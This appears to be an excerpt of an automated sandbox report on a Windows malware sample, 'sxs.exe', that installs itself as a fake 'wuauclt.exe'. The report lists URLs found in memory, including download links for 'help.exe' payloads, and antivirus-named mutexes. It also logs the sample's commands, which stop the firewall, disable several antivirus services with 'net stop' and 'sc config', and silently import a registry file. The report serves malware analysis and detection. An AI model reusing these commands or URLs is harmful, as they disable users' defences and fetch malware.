Source: wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/ie.t
Source: wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/ie.txt
Source: wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/ie.txt&
Source: wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/ie.txt)
Source: wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/ie.txt-
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/ie.txtSia
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/ie.txtZin
Source: wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/ie.txtp1
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/ie.txt~n
Source: wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234156390.00000000023B2000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/tean1.txt
Source: wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/tean1.txt&
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/tean1.txt8U
Source: wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/tean1.txtB
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/tean1.txtGE
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/tean1.txtJS;.JSE;.WSF;.WSH;#F
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/tean1.txtME
Source: sxs.exe, 00000000.00000003.2016117630.0000000000740000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177702991.00000000021E0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://w.tw7890.com/
Source: wuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.dvdforone.com
Source: explorer.exe, 0000002E.00000003.2804551864.0000000000565000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002E.00000002.2804925525.0000000000533000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.dvdforone.com/
Source: explorer.exe, 0000002E.00000003.2804701070.0000000000572000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002E.00000003.2804551864.0000000000565000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.dvdforone.com/0M
Source: explorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.dvdforone.com/23
Source: explorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.dvdforone.com/4b823s
Source: explorer.exe, 0000002E.00000003.2804701070.0000000000572000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002E.00000002.2804925525.0000000000573000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002E.00000003.2804551864.0000000000565000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.dvdforone.com/C:
Source: explorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.dvdforone.com/Vh
Source: explorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.dvdforone.com/Zy
Source: explorer.exe, 0000002D.00000002.2208846931.0000000000E83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.dvdforone.com/o
Source: wuauclt.exe, 0000002A.00000002.2235700906.0000000002220000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.dvdforone.comC:
Source: sxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.gamesrb.com/rbm/help.exe
Source: sxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.hg7890.com/hgb/help.exe
Source: sxs.exe, sxs.exe, 00000000.00000003.2016766274.0000000000740000.00000040.00001000.00020000.00000000.sdmp, sxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000002.00000002.3252602889.0000000000100000.00000040.00000400.00020000.00000000.sdmp, wuauclt.exe, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2180435124.0000000002310000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 0000002B.00000002.3252569275.0000000000D50000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://www.om7890.com/mfx/help.exe
Source: sxs.exe, 00000000.00000002.2041399746.000000000084B000.00000004.00000020.00020000.00000000.sdmp, sxs.exe, 00000000.00000002.2041399746.0000000000820000.00000004.00000020.00020000.00000000.sdmp, sxs.exe, 00000000.00000003.2035087789.0000000002175000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2043412825.0000000002908000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2043412825.0000000002900000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253732346.0000000002105000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.000000000066E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2101961189.00000000029A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2101961189.00000000029A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.onefordvd.com
Source: explorer.exe, 00000009.00000002.2101961189.00000000029A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.onefordvd.com(
Source: explorer.exe, 0000000C.00000002.2676562250.0000000001463000.00000004.00000020.00020000.00000000.sdmp, chromecache_94.8.dr | String found in binary or memory: http://www.onefordvd.com/
Source: explorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.00000000014AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.onefordvd.com/&
Source: explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.onefordvd.com/)
Source: explorer.exe, 00000009.00000002.2101961189.00000000029A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.onefordvd.com/10
Source: explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.onefordvd.com/23M4
Source: explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.onefordvd.com/4b823
Source: explorer.exe, 0000000C.00000002.2676562250.0000000001463000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.onefordvd.com/6x
Source: explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.onefordvd.com/A
Source: explorer.exe, 0000000C.00000003.2676269391.000000000148B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.000000000148C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.onefordvd.com/W
Source: explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.onefordvd.com/Y
Source: explorer.exe, 00000003.00000002.2043412825.0000000002908000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/c%1
Source: explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/i
Source: explorer.exe, 0000000C.00000003.2676269391.000000000148B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.000000000148C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/l
Source: explorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.00000000014AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/n
Source: explorer.exe, 0000000C.00000003.2676269391.000000000148B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.000000000148C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/s.lll
Source: explorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/t
Source: explorer.exe, 00000009.00000002.2101961189.00000000029A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/v
Source: explorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.00000000014AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/~
Source: explorer.exe, 00000003.00000002.2043412825.0000000002900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com2
Source: sxs.exe, 00000000.00000003.2035198425.0000000002281000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2043084095.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2043412825.0000000002900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2098672056.0000000002880000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2101961189.00000000029A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.comC:
Source: sxs.exe, 00000000.00000003.2035087789.0000000002175000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.comXV
Source: sxs.exe, 00000000.00000002.2041399746.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com_
Source: explorer.exe, 00000003.00000002.2043412825.0000000002900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.come
Source: sxs.exe, 00000000.00000002.2041399746.000000000084B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.comop
Source: sxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tw7890.com/twv/help.exe
Source: sxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tw7890.com/twv/help.exehttp://www.om7890.com/mfx/help.exehttp://www.hg7890.com/hgb/help.e
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.xxx.com/abc.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.xxx.com/ie.txt
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.xxx.com/qqmsg.txt
Source: chromecache_90.8.drString found in binary or memory: https://btloader.com/tag?o=5097926782615552&upapi=true
Source: chromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drString found in binary or memory: https://fonts.googleapis.com/css?family=
Source: chromecache_90.8.drString found in binary or memory: https://img1.wsimg.com/parking-lander/static/css/main.ef90a627.css
Source: chromecache_90.8.drString found in binary or memory: https://img1.wsimg.com/parking-lander/static/js/main.5bbf83b7.js
Source: wuauclt.exe, 0000002A.00000002.2235055048.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234500669.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.li
Source: sxs.exe, 00000000.00000002.2041399746.0000000000820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comC
Source: wuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comx
Source: chromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drString found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js
Source: chromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drString found in binary or memory: https://syndicatedsearch.goog
Source: chromecache_90.8.drString found in binary or memory: https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=true
Source: chromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drString found in binary or memory: https://www.google.com/pagead/1p-conversion/16521530460/?gad_source=1&adview_type=5
Source: chromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion/16521530460/?gad_source=1&adview_type=3
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:53760 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:53773 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:53799 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:53809 version: TLS 1.2

System Summary

Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\System32\regedit.exe" /s C:\Windows\noruns.reg
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_2_00404A98 PostQuitMessage,NtdllDefWindowProc_A
Source: C:\Windows\wuauclt.exe | Code function: 4_2_00404A98 PostQuitMessage,NtdllDefWindowProc_A
Source: C:\Windows\wuauclt.exe | Code function: 42_2_00404A98 PostQuitMessage,NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\sxs.exe | File created: C:\Windows\wuauclt.exe
Source: C:\Users\user\Desktop\sxs.exe | File created: C:\Windows\wuauclt.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\sxs.exe | File created: C:\Windows\noruns.reg
Source: C:\Windows\wuauclt.exe | File deleted: C:\Windows\noruns.reg
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_3_00700C12
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_2_00406928
Source: C:\Windows\wuauclt.exe | Code function: 4_3_005F0C12
Source: C:\Windows\wuauclt.exe | Code function: 4_2_00406928
Source: C:\Windows\wuauclt.exe | Code function: 42_3_02330C12
Source: C:\Windows\wuauclt.exe | Code function: 42_2_00406928
Source: C:\Users\user\Desktop\sxs.exe | Code function: String function: 00403B5C appears 34 times
Source: C:\Users\user\Desktop\sxs.exe | Code function: String function: 00404DD0 appears 36 times
Source: C:\Users\user\Desktop\sxs.exe | Code function: String function: 00404854 appears 32 times
Source: C:\Users\user\Desktop\sxs.exe | Code function: String function: 00403D4C appears 38 times
Source: C:\Windows\wuauclt.exe | Code function: String function: 00403B5C appears 68 times
Source: C:\Windows\wuauclt.exe | Code function: String function: 00404324 appears 34 times
Source: C:\Windows\wuauclt.exe | Code function: String function: 00404DD0 appears 76 times
Source: C:\Windows\wuauclt.exe | Code function: String function: 00404854 appears 64 times
Source: C:\Windows\wuauclt.exe | Code function: String function: 004039F4 appears 44 times
Source: C:\Windows\wuauclt.exe | Code function: String function: 00403D4C appears 78 times
Source: C:\Windows\wuauclt.exe | Code function: String function: 00403BA0 appears 60 times
Source: sxs.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: sxs.exe | Static PE information: Section: es2z2 ZLIB complexity 1.1896551724137931
Source: wuauclt.exe.0.dr | Static PE information: Section: es2z2 ZLIB complexity 1.1896551724137931
Source: classification engine | Classification label: mal100.spre.evad.winEXE@103/58@67/16
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_2_004047BC CreateToolhelp32Snapshot
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Windows\wuauclt.exe | Mutant created: \Sessions\1\BaseNamedObjects\KingsoftAntivirusScanProgram7Mutex
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\wuauclt.exe | Mutant created: \Sessions\1\BaseNamedObjects\SKYNET_PERSONAL_FIREWALL
Source: C:\Windows\wuauclt.exe | Mutant created: \Sessions\1\BaseNamedObjects\ASSISTSHELLMUTEX
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\wuauclt.exe | Mutant created: \Sessions\1\BaseNamedObjects\AntiTrojan3721
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\wuauclt.exe | Mutant created: \Sessions\1\BaseNamedObjects\VIRUS_ASMAPING_XZASDWRTTYEEWD82473M
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Users\user\Desktop\sxs.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown | Process created: C:\Windows\explorer.exe
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown | Process created: C:\Windows\explorer.exe
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\explorer.exe
Source: unknown | Process created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\sxs.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\sxs.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\sxs.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: sxs.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\Desktop\sxs.exe | File read: C:\Users\user\Desktop\sxs.exe
Source: unknown | Process created: C:\Users\user\Desktop\sxs.exe "C:\Users\user\Desktop\sxs.exe"
Source: C:\Users\user\Desktop\sxs.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
Source: C:\Users\user\Desktop\sxs.exe | Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" http://www.onefordvd.com
Source: C:\Users\user\Desktop\sxs.exe | Process created: C:\Windows\wuauclt.exe "C:\Windows\wuauclt.exe"
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2068,i,10012621105845313477,5144001626182359971,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" http://www.onefordvd.com
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\System32\regedit.exe" /s C:\Windows\noruns.reg
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop sharedaccess
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop KVWSC
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVWSC start= disabled
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop KVSrvXP
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVSrvXP start= disabled
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop kavsvc
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config kavsvc start= disabled
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config RsRavMon start= disabled
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop sharedaccess
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop RsCCenter
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop KVWSC
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config RsCCenter start= disabled
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop RsRavMon
